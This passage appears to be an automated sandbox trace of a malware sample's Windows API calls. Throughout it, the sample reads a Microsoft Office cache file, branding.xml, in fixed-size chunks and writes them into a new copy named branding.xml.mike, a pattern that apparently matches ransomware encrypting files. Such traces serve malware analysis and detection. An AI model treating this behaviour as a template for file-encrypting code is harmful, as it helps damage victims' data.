hFile=0x264, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x1b800 [0041.027] ReadFile (in: hFile=0x264, lpBuffer=0x226c394, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x226c394*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.027] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.027] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.028] GetFileType (hFile=0x264) returned 0x1 [0041.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.028] GetFileType (hFile=0x264) returned 0x1 [0041.028] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x1ba20 [0041.028] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.028] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.028] GetFileType (hFile=0x264) returned 0x1 [0041.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.028] GetFileType (hFile=0x264) returned 0x1 [0041.028] SetFilePointer (in: hFile=0x264, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x1e000 [0041.028] ReadFile (in: hFile=0x264, lpBuffer=0x227936c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x227936c*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.053] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.053] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.053] GetFileType (hFile=0x264) returned 0x1 [0041.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.053] GetFileType (hFile=0x264) returned 0x1 [0041.053] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x1e220 [0041.054] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.054] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.054] GetFileType (hFile=0x264) returned 0x1 [0041.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.054] GetFileType (hFile=0x264) returned 0x1 [0041.054] SetFilePointer (in: hFile=0x264, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x20800 [0041.054] ReadFile (in: hFile=0x264, lpBuffer=0x2286344, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2286344*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.055] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.055] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.056] GetFileType (hFile=0x264) returned 0x1 [0041.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.056] GetFileType (hFile=0x264) returned 0x1 [0041.056] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x20a20 [0041.056] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.056] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.056] GetFileType (hFile=0x264) returned 0x1 [0041.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.056] GetFileType (hFile=0x264) returned 0x1 [0041.056] SetFilePointer (in: hFile=0x264, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x23000 [0041.056] ReadFile (in: hFile=0x264, lpBuffer=0x229331c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x229331c*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.057] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.058] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.058] GetFileType (hFile=0x264) returned 0x1 [0041.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.058] GetFileType (hFile=0x264) returned 0x1 [0041.058] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x23220 [0041.058] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.058] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.058] GetFileType (hFile=0x264) returned 0x1 [0041.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.058] GetFileType (hFile=0x264) returned 0x1 [0041.058] SetFilePointer (in: hFile=0x264, lDistanceToMove=153600, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x25800 [0041.058] ReadFile (in: hFile=0x264, lpBuffer=0x22a02f4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22a02f4*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.060] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.060] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.060] GetFileType (hFile=0x264) returned 0x1 [0041.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.060] GetFileType (hFile=0x264) returned 0x1 [0041.060] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x25a20 [0041.060] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.060] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.060] GetFileType (hFile=0x264) returned 0x1 [0041.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.061] GetFileType (hFile=0x264) returned 0x1 [0041.061] SetFilePointer (in: hFile=0x264, lDistanceToMove=163840, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x28000 [0041.061] ReadFile (in: hFile=0x264, lpBuffer=0x22ad2cc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22ad2cc*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.062] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.062] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.062] GetFileType (hFile=0x264) returned 0x1 [0041.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.062] GetFileType (hFile=0x264) returned 0x1 [0041.062] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x28220 [0041.063] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.063] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.063] GetFileType (hFile=0x264) returned 0x1 [0041.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.063] GetFileType (hFile=0x264) returned 0x1 [0041.063] SetFilePointer (in: hFile=0x264, lDistanceToMove=174080, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2a800 [0041.063] ReadFile (in: hFile=0x264, lpBuffer=0x22ba2a4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22ba2a4*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.064] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.064] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.064] GetFileType (hFile=0x264) returned 0x1 [0041.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.064] GetFileType (hFile=0x264) returned 0x1 [0041.064] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2aa20 [0041.065] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.065] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.065] GetFileType (hFile=0x264) returned 0x1 [0041.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.065] GetFileType (hFile=0x264) returned 0x1 [0041.065] SetFilePointer (in: hFile=0x264, lDistanceToMove=184320, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2d000 [0041.065] ReadFile (in: hFile=0x264, lpBuffer=0x22c727c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22c727c*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.067] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.067] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.067] GetFileType (hFile=0x264) returned 0x1 [0041.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.067] GetFileType (hFile=0x264) returned 0x1 [0041.067] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2d220 [0041.067] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.068] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.068] GetFileType (hFile=0x264) returned 0x1 [0041.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.068] GetFileType (hFile=0x264) returned 0x1 [0041.068] SetFilePointer (in: hFile=0x264, lDistanceToMove=194560, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2f800 [0041.068] ReadFile (in: hFile=0x264, lpBuffer=0x22d4254, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22d4254*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.070] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.071] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.071] GetFileType (hFile=0x264) returned 0x1 [0041.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.071] GetFileType (hFile=0x264) returned 0x1 [0041.071] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2fa20 [0041.071] WriteFile (in: hFile=0x264, lpBuffer=0x20e706c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x20e706c*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.071] CloseHandle (hObject=0x264) returned 1 [0041.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.074] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.074] GetFileType (hFile=0x264) returned 0x1 [0041.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.074] GetFileType (hFile=0x264) returned 0x1 [0041.074] SetFilePointer (in: hFile=0x264, lDistanceToMove=204800, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x32000 [0041.074] ReadFile (in: hFile=0x264, lpBuffer=0x20e9adc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x20e9adc*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.075] CloseHandle (hObject=0x264) returned 1 [0041.075] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.075] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.075] GetFileType (hFile=0x264) returned 0x1 [0041.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.076] GetFileType (hFile=0x264) returned 0x1 [0041.076] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x32220 [0041.076] WriteFile (in: hFile=0x264, lpBuffer=0x20f4044*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x20f4044*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.076] CloseHandle (hObject=0x264) returned 1 [0041.078] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.078] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.078] GetFileType (hFile=0x264) returned 0x1 [0041.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.078] GetFileType (hFile=0x264) returned 0x1 